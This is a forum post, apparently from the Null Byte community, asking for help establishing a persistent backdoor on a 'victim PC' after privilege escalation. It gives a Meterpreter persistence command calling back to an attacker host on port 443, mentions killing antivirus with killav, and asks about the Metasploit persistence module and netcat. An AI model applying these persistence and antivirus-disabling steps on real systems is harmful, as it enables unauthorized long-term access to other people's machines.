Hello fellow Null Byters!
I have been trying for a while to set up a persistent backdoor but to no avail. After studying on the topic, I was thinking on 3 different approaches:
- Meterpreter's Persistence command
- The Persistence exploit (exploit/windows/local/persistence)
I tried to use the persistence command in a compromised computer after escalating my privileges. I set the following:
meterpreter> run persistence -A -L c:\\ -X -p443 -r 192.168.1.40
Everything seems to run smoothly but meter won't start the second session it is suppose to. Instead, when I check the victim PC, this is what I found:
I tried killing the AV with killav since I thought that the AV (AVG) could have picked it up. I had the same problem.
So i wondered, had anyone tried the Persistence exploit? I can't seem to figure this one out quite well since it doesn't give you the option to set host of port.
Do you think netcap would be the better solution to have a persistent backdoor? This would basically mean that I would have to install netcap on the victim first though, right?
Cheers and thank you for the feedback!